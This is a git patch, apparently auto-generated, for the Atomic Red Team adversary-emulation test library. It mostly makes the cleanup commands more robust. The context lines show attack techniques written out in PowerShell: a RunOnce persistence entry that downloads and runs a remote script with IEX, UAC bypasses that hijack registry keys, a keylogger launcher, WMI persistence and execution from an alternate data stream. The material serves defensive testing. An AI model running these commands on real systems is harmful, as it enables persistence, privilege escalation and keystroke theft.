From 9d8ffda86da1839b4126baa342a112f853bdcd03 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 28 Feb 2020 19:48:08 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1056/T1056.md | 2 +- atomics/T1060/T1060.md | 2 +- atomics/T1074/T1074.md | 2 +- atomics/T1084/T1084.md | 2 +- atomics/T1086/T1086.md | 2 +- atomics/T1088/T1088.md | 4 ++-- atomics/index.yaml | 18 +++++++++++------- 7 files changed, 18 insertions(+), 14 deletions(-) diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md index d4dd24f7..debe8295 100644 --- a/atomics/T1056/T1056.md +++ b/atomics/T1056/T1056.md @@ -37,7 +37,7 @@ Set-Location $PathToAtomicsFolder #### Cleanup Commands: ``` -Remove-Item $env:TEMP\key.log +Remove-Item $env:TEMP\key.log -ErrorAction Ignore ``` diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index dc091b63..a987a698 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md @@ -124,7 +124,7 @@ set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net #### Cleanup Commands: ``` -Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force +Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index 615b3822..b13ab751 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -69,7 +69,7 @@ Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -Destination #### Cleanup Commands: ``` -Remove-Item -Path $env:TEMP\Folder_to_zip.zip +Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore ``` diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index 771a642a..67610802 100644 --- a/atomics/T1084/T1084.md +++ b/atomics/T1084/T1084.md @@ -47,7 +47,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa ``` $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" -$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" +$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index 5a3d8914..c019c31f 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -390,7 +390,7 @@ Invoke-Expression $streamcommand #### Cleanup Commands: ``` -Remove:Item #{ads_file} +Remove-Item #{ads_file} -Force -ErrorAction Ignore ``` diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index 5a6bb8f8..60944e84 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -78,7 +78,7 @@ Start-Process "C:\Windows\System32\eventvwr.msc" #### Cleanup Commands: ``` -Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse +Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore ``` @@ -173,7 +173,7 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe" #### Cleanup Commands: ``` -Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse +Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index 26d3a963..d40d7ca9 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -3791,6 +3791,7 @@ persistence: $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force + -ErrorAction Ignore ' T1053: @@ -5021,7 +5022,7 @@ persistence: cleanup_command: | $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject @@ -5743,6 +5744,7 @@ defense-evasion: Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse + -ErrorAction Ignore ' - name: Bypass UAC using Fodhelper @@ -5812,7 +5814,7 @@ defense-evasion: Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\ComputerDefaults.exe" cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse + -Recurse -ErrorAction Ignore ' - name: Bypass UAC by Mocking Trusted Directories @@ -13157,6 +13159,7 @@ privilege-escalation: Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse + -ErrorAction Ignore ' - name: Bypass UAC using Fodhelper @@ -13226,7 +13229,7 @@ privilege-escalation: Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\ComputerDefaults.exe" cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse + -Recurse -ErrorAction Ignore ' - name: Bypass UAC by Mocking Trusted Directories @@ -20181,7 +20184,7 @@ credential-access: command: | Set-Location $PathToAtomicsFolder .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} - cleanup_command: 'Remove-Item $env:TEMP\key.log + cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore ' T1141: @@ -22185,7 +22188,7 @@ execution: Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand' $streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand' Invoke-Expression $streamcommand - cleanup_command: 'Remove:Item #{ads_file} + cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore ' T1121: @@ -25917,7 +25920,8 @@ collection: -DestinationPath $env:TEMP\Folder_to_zip.zip ' - cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip + cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction + Ignore ' '': @@ -26215,7 +26219,7 @@ collection: command: | Set-Location $PathToAtomicsFolder .\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} - cleanup_command: 'Remove-Item $env:TEMP\key.log + cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore ' T1113: